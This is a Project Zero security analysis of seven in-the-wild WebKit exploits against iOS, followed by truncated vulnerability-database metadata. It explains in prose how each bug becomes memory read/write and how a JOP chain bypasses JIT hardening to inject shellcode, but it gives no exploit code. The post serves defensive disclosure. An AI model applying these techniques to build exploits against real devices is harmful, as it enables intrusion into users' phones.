JSC Exploits

2019-08-29T00:00:00

Description

Posted by Samuel Groß, Project Zero ** ** In this post, we will take a look at the WebKit exploits used to gain an initial foothold onto the iOS device and stage the privilege escalation exploits. All exploits here achieve shellcode execution inside the sandboxed renderer process (WebContent) on iOS. Although Chrome on iOS would have also been vulnerable to these initial browser exploits, they were only used by the attacker to target Safari and iPhones. After some general discussion, this post first provides a short walkthrough of each of the exploited WebKit bugs and how the attackers construct a memory read/write primitive from them, followed by an overview of the techniques used to gain shellcode execution and how they bypassed existing JIT code injection mitigations, namely the “bulletproof JIT”. It is worth noting that none of the exploits bypassed the new, PAC-based JIT hardenings that are enabled on A12 devices. The exploit writeups are sorted by the most recent iOS version the exploit supports as indicated by a version check in the exploit code itself. If that version check was missing from the exploit, the supported version range was guessed based on the date of the fix and the previous exploits. The renderer exploits follow common practice and first gain memory read/write capabilities, then inject shellcode into the JIT region to gain native code execution. In general it seems that every time a new bug was necessary/available, the new bug was exploited for read/write and then plugged into the existing exploit framework. The exploits for the different bugs also appear to generally use common exploit techniques, e.g. by first creating [the addrof and fakeobj primitives](<http://www.phrack.org/papers/attacking_javascript_engines.html>), then faking JS objects to achieve read/write. For many of the exploits it is unclear whether they were originally exploited as 0day or as 1day after a fix had already shipped. It is also unknown how the attackers obtained knowledge of the vulnerabilities in the first place. Generally they could have discovered the vulnerabilities themselves or used public exploits released after a fix had shipped. Furthermore, at least for WebKit, it is often possible to extract details of a vulnerability from the public source code repository before the fix has been shipped to users. [CVE-2019-8518](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1775>) can be used to highlight this problem (as can many other recent vulnerabilities). The vulnerability was publicly fixed in WebKit HEAD on Feb 9 2019 with commit [4a23c92e6883](<https://github.com/WebKit/webkit/commit/4a23c92e6883b230a437bcc09f94422d7df8756c>). This commit contains a testcase that triggers the issue and causes an out-of-bounds access into a JSArray - a scenario that is usually easy to exploit. However, the fix only shipped to users with the release of iOS 12.2 on March 25 2019, roughly one and a half months after details about the vulnerability were public. An attacker in possession of a working exploit for an older WebKit vulnerability would likely only need a few days to replace the underlying vulnerability and thus gain the capability to exploit up-to-date devices without the need to find new vulnerabilities themselves. It is likely that this happened for at least some of the following exploits. For comparison, here is how other browser vendors deal with this “patch-gap” or vulnerability window problem: * Google has this same problem with Chromium (e.g. commit [52a9e67a477b](<https://chromium.googlesource.com/v8/v8.git/+/52a9e67a477bdb67ca893c25c145ef5191976220>) fixing [CVE-2018-17463](<http://www.phrack.org/papers/jit_exploitation.html>) and including a PoC trigger). However, it appears that some recent bugfixes no longer include the JavaScript test cases commits. For example the following two fixes for vulnerabilities reported by our team member Sergey Glazunov: [aa00ee22f8f7](<https://chromium.googlesource.com/v8/v8.git/+/aa00ee22f8f7722b505fc24acf7e544dfe59ce77>) (for issue [1784](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1784>)) and [4edcc8605461](<https://chromium.googlesource.com/v8/v8.git/+/4edcc860546157cb35940663afb9af568595888f>) (for issue [1793](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1793>)). In the latter case, only a C++ test was added that tested the new behaviour without indication of how the vulnerable code could be reached. * Microsoft keeps security fixes in the open source Chakra engine private until the fixes have been shipped to users. The security fixes are then released and marked as such with a CVE identifier. See commit [7f0d390ad77d](<https://github.com/microsoft/ChakraCore/commit/7f0d390ad77d838cbb81d4586c83ec822f384ce8>) for an example of this. However, it should be noted that Chakra will soon be replaced by V8 (Chromium’s JavaScript engine) in Edge. * Mozilla appears to hold back security fixes from the public repository until somewhat close to the next release. Furthermore, the commits usually do not include the JavaScript testcases used to trigger the vulnerability. However, it is worth noting that even if no JavaScript testcase is attached to the commit, it is often still possible to reconstruct a trigger (and ultimately an exploit) for the vulnerability from the code changes and/or commit message with moderate effort. ## Exploit 1: iOS 10.0 until 10.3.2 This exploit targets CVE-2017-2505 which was originally reported by lokihardt as Project Zero issue [1137](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1137>) and fixed in WebKit HEAD with commit [4a23c92e6883](<https://github.com/WebKit/webkit/commit/4a23c92e6883b230a437bcc09f94422d7df8756c>) on Mar 11th 2017. The fix was then shipped to users with the release of iOS 10.3.2 on May 15th 2017, over two months later. Of interest, the exploit trigger is almost exactly the same as in the bug report and the regression test file in the WebKit repository. This can be seen in the following two images, the left one showing the testcase published in the WebKit code repository as part of the bugfix and the right showing the part of the in-the-wild exploit code that triggered the bug. [![This image shows a line-by-line, side-by-side comparison between the vulnerability test case from the webkit tracker on the left, and the vulnerability trigger code used in the exploit on the right. They are very similar, with matching variable names and code structure. The only difference is that one value which had the fixed value 1.45 in the test case has been parameterised out to a variable named ow in the exploit, and the trigger has been wrapped inside a function definition which takes ow as an argument.](https://1.bp.blogspot.com/-PEZlVLEefs0/XWg4BdDSxkI/AAAAAAAANUs/ELjHWgzHOZIRKSTV45E-moRivJKrAWIkACLcBGAs/s640/JSC%2BDIFF.png)](<https://1.bp.blogspot.com/-PEZlVLEefs0/XWg4BdDSxkI/AAAAAAAANUs/ELjHWgzHOZIRKSTV45E-moRivJKrAWIkACLcBGAs/s1600/JSC%2BDIFF.png>) The bug causes an out-of-bounds write to the JSC heap with controlled data. The attackers exploit this by corrupting the first QWord of a controlled JSObject, changing its Structure ID (which associates runtime type information with a JSCell) to make it appear as a Uint32Array instead. This way, they essentially create a fake TypedArray which directly allows them to construct a memory read/write primitive. ## Exploit 2: iOS 10.3 until 10.3.3 This exploit seems to target CVE-2017-7064 (or a variant thereof), which was originally discovered by lokihardt and reported as issue [1236](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1236>). The bug was fixed in WebKit HEAD with commit [ad6d74945b13](<https://github.com/WebKit/webkit/commit/ad6d74945b13a8ca682bffe5b4e9f1c6ce0ae692>) on Apr 18th 2017 and shipped to users with the release of iOS 10.3.3 on Jul 19th 2017, over three months later. The bug causes uninitialized memory to be treated as the content of a JS Array. Through standard heap manipulation techniques it is possible to control the uninitialized data, at which point it becomes possible to construct the well-known addrof and fakeobj primitives through a type confusion between doubles and JSValues and thus gain memory read/write by constructing a fake TypedArray. ## Exploit 3: likely iOS 11.0 until 11.3 This exploit targets the WebKit bug [181867](<https://bugs.webkit.org/show_bug.cgi?id=181867>) which might be CVE-2018-4122. It was fixed in WebKit HEAD on Jan 19, 2018 and presumably shipped to users with the release of iOS 11.3 on Mar 29th 2018. The bug is a classic (by 2019 standards) [JIT side-effect modelling issue](<https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf>). It remains unclear whether the attackers knew about this bug class before it started to be widely known around the beginning of 2018. The exploit again constructs the addrof and fakeobj primitives by confusing unboxed double and JSValue arrays, then gains memory read/write by again faking a typed array object. ## Exploit 4: likely iOS 11.3 until 11.4.1 This exploit targets the bug fixed in commit [b4e567d371fd](<https://github.com/WebKit/webkit/commit/b4e567d371fde84474a56810a03bf3d0719aed1e>) on May 16th 2018 and corresponding to WebKit issue [185694](<https://bugs.webkit.org/show_bug.cgi?id=185694>). Unfortunately, we were unable to determine the CVE assigned to this issue, but it seems likely that the fix shipped to users with the release of iOS 11.4.1 on Jul 9th 2018. This is another JIT side-effect modelling bug with similar exploit to the previous one, again constructing the fakeobj primitive to fake JS object. However, by now the [Gigacage mitigation](<https://labs.mwrinfosecurity.com/blog/some-brief-notes-on-webkit-heap-hardening/>) had shipped. As such it was no longer useful to construct fake ArrayBuffers/TypedArrays. Instead, the exploit constructs a fake unboxed double Array and with that gains an initial, somewhat limited memory read/write primitive. It then appears to use that initial primitive to disable the Gigacage mitigation and then continues to abuse TypedArrays to perform the rest of the exploit work. ## Exploit 5: iOS 11.4.1 This exploit targets CVE-2018-4438, which was first reported by lokihardt as issue [1649](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1649>). The bug was fixed with commit [8deb8bd96f4a](<https://github.com/WebKit/webkit/commit/8deb8bd96f4a27bf8bb60334c9247cc14ceab2eb>) on Oct 26th 2018 and shipped to users with the release of iOS 12.1.1 on Dec 5th 2018. Due to the bug, it was possible to construct an Array with a Proxy prototype that wasn’t expected by the engine. It is then possible to turn this bug into an incorrect side-effect modelling issue by performing effectful changes during a proxy trap triggered (unexpectedly) in JIT compiled code. The exploit is then very similar to the previous one, first disabling the Gigacage with the limited JS Array read/write, then performing the shellcode injection with a full read/write via TypedArrays. ## Exploit 6: likely iOS 12.0 until 12.1.1 This exploit targets CVE-2018-4442, which was originally discovered by lokihardt and reported as issue [1699](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1699>) and fixed in HEAD with commit [1f1683cea15c](<https://github.com/WebKit/webkit/commit/1f1683cea15c2af14710b4b73f89b55004618295>) on Oct 17th 2018. The fix then shipped to users with the release of iOS 12.1.1 on Dec 5th 2018. In contrast to the other bugs, this bug yields a use-after-free in the JavaScriptEngine. Similar to the PoC in the WebKit tracker, the attackers abuse the UaF by freeing the property backing storage of an object (the butterfly), then reclaim that storage with a [JSBoundFunction’s m_boundArgs](<https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/JSBoundFunction.h#L57>) array by repeatedly calling func.bind(). If that is successful, the attackers are now able to get access to an internal object, m_boundArgs, by loading a property from the freed object’s butterfly. With that, it becomes possible to construct an OOB access by making the m_boundArgs array sparse, then calling the bound function. This will invoke [JSBoundFunction::boundArgsCopy](<https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/JSBoundFunction.cpp#L216>) which assumes that m_boundArgs is dense and otherwise reads JSValues past the end of a buffer which it passes as argument to a controlled function (that was bound() previously). This fact has been exploited in the past, which is why there is now a comment next to the definition of m_boundArgs: `// DO NOT allow this array to be mutated!`. From there, the attackers again construct the addrof and fakeobj primitives and reuse the rest of the exploit from before. ## Exploit 7: iOS 12.1.1 until 12.1.3 The final exploit targets the same bug as exploited by Linus Henze here: [https://github.com/LinusHenze/WebKit-RegEx-Exploit](<https://github.com/LinusHenze/WebKit-RegEx-Exploit>), which is again a JIT side-effect modelling issue. The WebKit bugtracker id for it appears to be [191731](<https://bugs.webkit.org/show_bug.cgi?id=191731>). It is unclear whether a CVE number was assigned to it, but it could be CVE-2019-6217 which was disclosed during mobile Pwn2Own that year by Team flouroacetate. The bug seems to have been fixed on Nov 16th 2018 and shipped to users with the release of iOS 12.1.3 on Jan 22nd 2019. Instead of using WASM objects to gain memory read/write as Linus does, the attackers appear to instead have plugged the new bug into their old exploit and again create a fake JS Array to gain initial memory read/write capabilities, then continue the same way they did before. ## Shellcode Execution After gaining memory read/write capabilities, the renderer exploit pivots to shellcode execution, which then performs the privilege escalation exploits. The way they achieve shellcode execution is the same in all exploits: by bypassing the JIT mitigations to overwrite an existing function’s JIT code and then invoking that function. For some time now (first announced by Apple at [BlackHat 2016](<https://www.blackhat.com/docs/us-16/materials/us-16-Krstic.pdf>) and then shipped with iOS 10), iOS features a JIT hardening measure that aims to make it more difficult for an attacker to write code directly into the RWX JIT region. It basically achieves that by creating a second, “hidden” mapping of the JIT region that is writable and keeping the first mapping of the region non-writable. However, one weakness of this approach, and acknowledged in the presentation by Apple, is that there has to be a “jit_memcpy” function that is called to copy the generated code into the JIT region. As such, it remains viable to perform a ROP or JOP style attack to execute this function with controlled shellcode as argument. This is what the attackers do as well. This problem now appears to be somewhat mitigated on PAC enabled devices by signing the JIT code during code generation and verifying the signature later on. The exploits we found did not include a bypass for PAC enabled devices and instead bailed out if they ran on an A12 device. In more detail, the attackers construct a JOP chain, consisting of three different gadgets that allow them to perform a function call of an arbitrary function with controlled arguments. To kick off the chain, they replace the native function pointer of the `escape` JS function with the first gadget of the chain. The chain then performs a call to the ”jit_memcpy” function to overwrite the JIT code of a previously compiled function with the shellcode. Finally they replace the function pointer of `escape` one last time and point it to the shellcode inside the JIT region.

{"id": "GOOGLEPROJECTZERO:A46B3136EBE92DFE53548BB20EFF1ABC", "type": "googleprojectzero", "bulletinFamily": "info", "title": "\nJSC Exploits\n", "description": "Posted by Samuel Gro\u00df, Project Zero\n\n** \n** \n\n\nIn this post, we will take a look at the WebKit exploits used to gain an initial foothold onto the iOS device and stage the privilege escalation exploits. All exploits here achieve shellcode execution inside the sandboxed renderer process (WebContent) on iOS. Although Chrome on iOS would have also been vulnerable to these initial browser exploits, they were only used by the attacker to target Safari and iPhones. \n \nAfter some general discussion, this post first provides a short walkthrough of each of the exploited WebKit bugs and how the attackers construct a memory read/write primitive from them, followed by an overview of the techniques used to gain shellcode execution and how they bypassed existing JIT code injection mitigations, namely the \u201cbulletproof JIT\u201d. \n \nIt is worth noting that none of the exploits bypassed the new, PAC-based JIT hardenings that are enabled on A12 devices. The exploit writeups are sorted by the most recent iOS version the exploit supports as indicated by a version check in the exploit code itself. If that version check was missing from the exploit, the supported version range was guessed based on the date of the fix and the previous exploits. \n \nThe renderer exploits follow common practice and first gain memory read/write capabilities, then inject shellcode into the JIT region to gain native code execution. In general it seems that every time a new bug was necessary/available, the new bug was exploited for read/write and then plugged into the existing exploit framework. The exploits for the different bugs also appear to generally use common exploit techniques, e.g. by first creating [the addrof and fakeobj primitives](<http://www.phrack.org/papers/attacking_javascript_engines.html>), then faking JS objects to achieve read/write. \n \nFor many of the exploits it is unclear whether they were originally exploited as 0day or as 1day after a fix had already shipped. It is also unknown how the attackers obtained knowledge of the vulnerabilities in the first place. Generally they could have discovered the vulnerabilities themselves or used public exploits released after a fix had shipped. Furthermore, at least for WebKit, it is often possible to extract details of a vulnerability from the public source code repository before the fix has been shipped to users. [CVE-2019-8518](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1775>) can be used to highlight this problem (as can many other recent vulnerabilities). The vulnerability was publicly fixed in WebKit HEAD on Feb 9 2019 with commit [4a23c92e6883](<https://github.com/WebKit/webkit/commit/4a23c92e6883b230a437bcc09f94422d7df8756c>). This commit contains a testcase that triggers the issue and causes an out-of-bounds access into a JSArray - a scenario that is usually easy to exploit. However, the fix only shipped to users with the release of iOS 12.2 on March 25 2019, roughly one and a half months after details about the vulnerability were public. An attacker in possession of a working exploit for an older WebKit vulnerability would likely only need a few days to replace the underlying vulnerability and thus gain the capability to exploit up-to-date devices without the need to find new vulnerabilities themselves. It is likely that this happened for at least some of the following exploits. \n \nFor comparison, here is how other browser vendors deal with this \u201cpatch-gap\u201d or vulnerability window problem:\n\n * Google has this same problem with Chromium (e.g. commit [52a9e67a477b](<https://chromium.googlesource.com/v8/v8.git/+/52a9e67a477bdb67ca893c25c145ef5191976220>) fixing [CVE-2018-17463](<http://www.phrack.org/papers/jit_exploitation.html>) and including a PoC trigger). However, it appears that some recent bugfixes no longer include the JavaScript test cases commits. For example the following two fixes for vulnerabilities reported by our team member Sergey Glazunov: [aa00ee22f8f7](<https://chromium.googlesource.com/v8/v8.git/+/aa00ee22f8f7722b505fc24acf7e544dfe59ce77>) (for issue [1784](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1784>)) and [4edcc8605461](<https://chromium.googlesource.com/v8/v8.git/+/4edcc860546157cb35940663afb9af568595888f>) (for issue [1793](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1793>)). In the latter case, only a C++ test was added that tested the new behaviour without indication of how the vulnerable code could be reached.\n\n * Microsoft keeps security fixes in the open source Chakra engine private until the fixes have been shipped to users. The security fixes are then released and marked as such with a CVE identifier. See commit [7f0d390ad77d](<https://github.com/microsoft/ChakraCore/commit/7f0d390ad77d838cbb81d4586c83ec822f384ce8>) for an example of this. However, it should be noted that Chakra will soon be replaced by V8 (Chromium\u2019s JavaScript engine) in Edge.\n\n * Mozilla appears to hold back security fixes from the public repository until somewhat close to the next release. Furthermore, the commits usually do not include the JavaScript testcases used to trigger the vulnerability.\n\n \nHowever, it is worth noting that even if no JavaScript testcase is attached to the commit, it is often still possible to reconstruct a trigger (and ultimately an exploit) for the vulnerability from the code changes and/or commit message with moderate effort. \n\n\n## Exploit 1: iOS 10.0 until 10.3.2\n\nThis exploit targets CVE-2017-2505 which was originally reported by lokihardt as Project Zero issue [1137](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1137>) and fixed in WebKit HEAD with commit [4a23c92e6883](<https://github.com/WebKit/webkit/commit/4a23c92e6883b230a437bcc09f94422d7df8756c>) on Mar 11th 2017. The fix was then shipped to users with the release of iOS 10.3.2 on May 15th 2017, over two months later. \n \nOf interest, the exploit trigger is almost exactly the same as in the bug report and the regression test file in the WebKit repository. This can be seen in the following two images, the left one showing the testcase published in the WebKit code repository as part of the bugfix and the right showing the part of the in-the-wild exploit code that triggered the bug.\n\n \n \n\n\n[![This image shows a line-by-line, side-by-side comparison between the vulnerability test case from the webkit tracker on the left, and the vulnerability trigger code used in the exploit on the right. They are very similar, with matching variable names and code structure. The only difference is that one value which had the fixed value 1.45 in the test case has been parameterised out to a variable named ow in the exploit, and the trigger has been wrapped inside a function definition which takes ow as an argument.](https://1.bp.blogspot.com/-PEZlVLEefs0/XWg4BdDSxkI/AAAAAAAANUs/ELjHWgzHOZIRKSTV45E-moRivJKrAWIkACLcBGAs/s640/JSC%2BDIFF.png)](<https://1.bp.blogspot.com/-PEZlVLEefs0/XWg4BdDSxkI/AAAAAAAANUs/ELjHWgzHOZIRKSTV45E-moRivJKrAWIkACLcBGAs/s1600/JSC%2BDIFF.png>)\n\n \nThe bug causes an out-of-bounds write to the JSC heap with controlled data. The attackers exploit this by corrupting the first QWord of a controlled JSObject, changing its Structure ID (which associates runtime type information with a JSCell) to make it appear as a Uint32Array instead. This way, they essentially create a fake TypedArray which directly allows them to construct a memory read/write primitive.\n\n## Exploit 2: iOS 10.3 until 10.3.3\n\nThis exploit seems to target CVE-2017-7064 (or a variant thereof), which was originally discovered by lokihardt and reported as issue [1236](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1236>). The bug was fixed in WebKit HEAD with commit [ad6d74945b13](<https://github.com/WebKit/webkit/commit/ad6d74945b13a8ca682bffe5b4e9f1c6ce0ae692>) on Apr 18th 2017 and shipped to users with the release of iOS 10.3.3 on Jul 19th 2017, over three months later. \n \nThe bug causes uninitialized memory to be treated as the content of a JS Array. Through standard heap manipulation techniques it is possible to control the uninitialized data, at which point it becomes possible to construct the well-known addrof and fakeobj primitives through a type confusion between doubles and JSValues and thus gain memory read/write by constructing a fake TypedArray.\n\n## Exploit 3: likely iOS 11.0 until 11.3\n\nThis exploit targets the WebKit bug [181867](<https://bugs.webkit.org/show_bug.cgi?id=181867>) which might be CVE-2018-4122. It was fixed in WebKit HEAD on Jan 19, 2018 and presumably shipped to users with the release of iOS 11.3 on Mar 29th 2018. \n \nThe bug is a classic (by 2019 standards) [JIT side-effect modelling issue](<https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf>). It remains unclear whether the attackers knew about this bug class before it started to be widely known around the beginning of 2018. The exploit again constructs the addrof and fakeobj primitives by confusing unboxed double and JSValue arrays, then gains memory read/write by again faking a typed array object.\n\n## Exploit 4: likely iOS 11.3 until 11.4.1\n\nThis exploit targets the bug fixed in commit [b4e567d371fd](<https://github.com/WebKit/webkit/commit/b4e567d371fde84474a56810a03bf3d0719aed1e>) on May 16th 2018 and corresponding to WebKit issue [185694](<https://bugs.webkit.org/show_bug.cgi?id=185694>). Unfortunately, we were unable to determine the CVE assigned to this issue, but it seems likely that the fix shipped to users with the release of iOS 11.4.1 on Jul 9th 2018. \n \nThis is another JIT side-effect modelling bug with similar exploit to the previous one, again constructing the fakeobj primitive to fake JS object. However, by now the [Gigacage mitigation](<https://labs.mwrinfosecurity.com/blog/some-brief-notes-on-webkit-heap-hardening/>) had shipped. As such it was no longer useful to construct fake ArrayBuffers/TypedArrays. Instead, the exploit constructs a fake unboxed double Array and with that gains an initial, somewhat limited memory read/write primitive. It then appears to use that initial primitive to disable the Gigacage mitigation and then continues to abuse TypedArrays to perform the rest of the exploit work.\n\n## Exploit 5: iOS 11.4.1\n\nThis exploit targets CVE-2018-4438, which was first reported by lokihardt as issue [1649](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1649>). The bug was fixed with commit [8deb8bd96f4a](<https://github.com/WebKit/webkit/commit/8deb8bd96f4a27bf8bb60334c9247cc14ceab2eb>) on Oct 26th 2018 and shipped to users with the release of iOS 12.1.1 on Dec 5th 2018. \n \nDue to the bug, it was possible to construct an Array with a Proxy prototype that wasn\u2019t expected by the engine. It is then possible to turn this bug into an incorrect side-effect modelling issue by performing effectful changes during a proxy trap triggered (unexpectedly) in JIT compiled code. The exploit is then very similar to the previous one, first disabling the Gigacage with the limited JS Array read/write, then performing the shellcode injection with a full read/write via TypedArrays.\n\n## Exploit 6: likely iOS 12.0 until 12.1.1\n\nThis exploit targets CVE-2018-4442, which was originally discovered by lokihardt and reported as issue [1699](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1699>) and fixed in HEAD with commit [1f1683cea15c](<https://github.com/WebKit/webkit/commit/1f1683cea15c2af14710b4b73f89b55004618295>) on Oct 17th 2018. The fix then shipped to users with the release of iOS 12.1.1 on Dec 5th 2018. \n \nIn contrast to the other bugs, this bug yields a use-after-free in the JavaScriptEngine. Similar to the PoC in the WebKit tracker, the attackers abuse the UaF by freeing the property backing storage of an object (the butterfly), then reclaim that storage with a [JSBoundFunction\u2019s m_boundArgs](<https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/JSBoundFunction.h#L57>) array by repeatedly calling func.bind(). If that is successful, the attackers are now able to get access to an internal object, m_boundArgs, by loading a property from the freed object\u2019s butterfly. With that, it becomes possible to construct an OOB access by making the m_boundArgs array sparse, then calling the bound function. This will invoke [JSBoundFunction::boundArgsCopy](<https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/JSBoundFunction.cpp#L216>) which assumes that m_boundArgs is dense and otherwise reads JSValues past the end of a buffer which it passes as argument to a controlled function (that was bound() previously). \n \nThis fact has been exploited in the past, which is why there is now a comment next to the definition of m_boundArgs: `// DO NOT allow this array to be mutated!`. From there, the attackers again construct the addrof and fakeobj primitives and reuse the rest of the exploit from before.\n\n## Exploit 7: iOS 12.1.1 until 12.1.3\n\nThe final exploit targets the same bug as exploited by Linus Henze here: [https://github.com/LinusHenze/WebKit-RegEx-Exploit](<https://github.com/LinusHenze/WebKit-RegEx-Exploit>), which is again a JIT side-effect modelling issue. The WebKit bugtracker id for it appears to be [191731](<https://bugs.webkit.org/show_bug.cgi?id=191731>). It is unclear whether a CVE number was assigned to it, but it could be CVE-2019-6217 which was disclosed during mobile Pwn2Own that year by Team flouroacetate. The bug seems to have been fixed on Nov 16th 2018 and shipped to users with the release of iOS 12.1.3 on Jan 22nd 2019. \n \nInstead of using WASM objects to gain memory read/write as Linus does, the attackers appear to instead have plugged the new bug into their old exploit and again create a fake JS Array to gain initial memory read/write capabilities, then continue the same way they did before.\n\n## Shellcode Execution\n\nAfter gaining memory read/write capabilities, the renderer exploit pivots to shellcode execution, which then performs the privilege escalation exploits. The way they achieve shellcode execution is the same in all exploits: by bypassing the JIT mitigations to overwrite an existing function\u2019s JIT code and then invoking that function. \n \nFor some time now (first announced by Apple at [BlackHat 2016](<https://www.blackhat.com/docs/us-16/materials/us-16-Krstic.pdf>) and then shipped with iOS 10), iOS features a JIT hardening measure that aims to make it more difficult for an attacker to write code directly into the RWX JIT region. It basically achieves that by creating a second, \u201chidden\u201d mapping of the JIT region that is writable and keeping the first mapping of the region non-writable. However, one weakness of this approach, and acknowledged in the presentation by Apple, is that there has to be a \u201cjit_memcpy\u201d function that is called to copy the generated code into the JIT region. As such, it remains viable to perform a ROP or JOP style attack to execute this function with controlled shellcode as argument. This is what the attackers do as well. This problem now appears to be somewhat mitigated on PAC enabled devices by signing the JIT code during code generation and verifying the signature later on. The exploits we found did not include a bypass for PAC enabled devices and instead bailed out if they ran on an A12 device. \n \nIn more detail, the attackers construct a JOP chain, consisting of three different gadgets that allow them to perform a function call of an arbitrary function with controlled arguments. To kick off the chain, they replace the native function pointer of the `escape` JS function with the first gadget of the chain. The chain then performs a call to the \u201djit_memcpy\u201d function to overwrite the JIT code of a previously compiled function with the shellcode. Finally they replace the function pointer of `escape` one last time and point it to the shellcode inside the JIT region.\n", "published": "2019-08-29T00:00:00", "modified": "2019-08-29T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html", "reporter": "GoogleProjectZero", "references": [], "cvelist": ["CVE-2017-2505", "CVE-2017-7064", "CVE-2018-17463", "CVE-2018-4122", "CVE-2018-4438", "CVE-2018-4442", "CVE-2019-6217", "CVE-2019-8518", "CVE-2019-8646"], "immutableFields": [], "lastseen": "2021-07-30T19:22:59", "viewCount": 66, "enchantments": {"dependencies": {"references": [{"type": "apple", "idList": ["APPLE:0185CC37EE7038D3199A6E5B2057A61C", "APPLE:100C3E37B89C4B8E50DE097059456EC2", "APPLE:114C93F6E9562A87B113C0263CD1817D", "APPLE:21F236C1A9D411224D0D290A7D88873F", "APPLE:26A4DD401596A54883933FFA750F140A", "APPLE:34416127035F64778C9F3F0EB9CDBC11", "APPLE:423789A788D6D3E2809B401C45687850", "APPLE:42A8665131AAD41DD01DD2DE9BBDEBC5", "APPLE:444B5944D49C1B1DB2F8D833473A3E28", "APPLE:44A3ECC7D3B2719CF4A259F2E411BB53", "APPLE:45AEF0978F404334493CA78A1CA75347", "APPLE:48DFAA81838B82F0614B9A03F99F251D", "APPLE:4D5091F8F1A9B18C444D1AD97567CE76", "APPLE:5C4BCF7A4E483742CFDCE8A4CB334C8E", "APPLE:5D035145E3EE53A8C36DC063A0DC8B49", "APPLE:5DC0F458B41AAC5AEDC2DDFE4C176AA7", "APPLE:66FADA9BFB47C90D568A156164B964D6", "APPLE:6B41E03BE95C41152A91DE7584480E16", "APPLE:6C518E60468B6DC0634A48452DB0FFBE", "APPLE:71C21790A57960E5B8D57DC4227D5449", "APPLE:7AFC35B4B1D8C25A050E4C951554FD97", "APPLE:819AEF513AB880D6C4F6CA66CB3C0021", "APPLE:8C49A1E8A033BC61B2EB11E42BABEFC6", "APPLE:9B31F90F381961095FA996D2A3A9579C", "APPLE:A49C40F4327A861EBE2E91DA2786C348", "APPLE:B4A175C182756FCB9C8C7BC8F7CC89F0", "APPLE:B93E9072DD7B0B072DE4948F392F64AE", "APPLE:B9D8B8E6AD5C97CD8596F47682EA2AD9", "APPLE:CEC7DCE5379D5C1DBB2795CA582D13CD", "APPLE:CFC2451DF75048E4D98C6C690A558872", "APPLE:D6582852ADC12259E5A65509B1EDEA8C", "APPLE:DB93D66014439127A48A03A39A345E1E", "APPLE:E1B2FDC8AFC1E2B240E65D382EBD5FEA", "APPLE:F5ED4B2C8BF2CB139C4753A54898E258", "APPLE:F7C054E723805E34E0E58C0D3E614976", "APPLE:HT207798", "APPLE:HT207801", "APPLE:HT207804", "APPLE:HT207921", "APPLE:HT207923", "APPLE:HT207927", "APPLE:HT207928", "APPLE:HT208693", "APPLE:HT208694", "APPLE:HT208695", "APPLE:HT208696", "APPLE:HT208697", "APPLE:HT208698", "APPLE:HT209340", "APPLE:HT209342", "APPLE:HT209343", "APPLE:HT209344", "APPLE:HT209345", "APPLE:HT209346", "APPLE:HT209443", "APPLE:HT209447", "APPLE:HT209448", "APPLE:HT209449", "APPLE:HT209450", "APPLE:HT209451", "APPLE:HT209599", "APPLE:HT209601", "APPLE:HT209602", "APPLE:HT209603", "APPLE:HT209604", "APPLE:HT209605", "APPLE:HT210346", "APPLE:HT210348", "APPLE:HT210351", "APPLE:HT210353"]}, {"type": "archlinux", "idList": ["ASA-201707-25", "ASA-201810-12"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1037", "CPAI-2017-1038", "CPAI-2018-1319", "CPAI-2018-1320", "CPAI-2018-1597", "CPAI-2019-1098", "CPAI-2019-2192"]}, {"type": "chrome", "idList": ["GCSA-1598641215032171443"]}, {"type": "cve", "idList": ["CVE-2017-2505", "CVE-2017-7064", "CVE-2018-17463", "CVE-2018-4122", "CVE-2018-4438", "CVE-2018-4442", "CVE-2019-6217", "CVE-2019-8518", "CVE-2019-8646"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4330-1:7D0A8", "DEBIAN:DSA-4330-1:C6D67"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-2505", "DEBIANCVE:CVE-2017-7064", "DEBIANCVE:CVE-2018-17463", "DEBIANCVE:CVE-2018-4122", "DEBIANCVE:CVE-2018-4438", "DEBIANCVE:CVE-2018-4442", "DEBIANCVE:CVE-2019-6217", "DEBIANCVE:CVE-2019-8518"]}, {"type": "fedora", "idList": ["FEDORA:33FB9639A184", "FEDORA:417B06017118", "FEDORA:532F960CF00C", "FEDORA:D681D609273A", "FEDORA:DA59A6087D6C"]}, {"type": "freebsd", "idList": 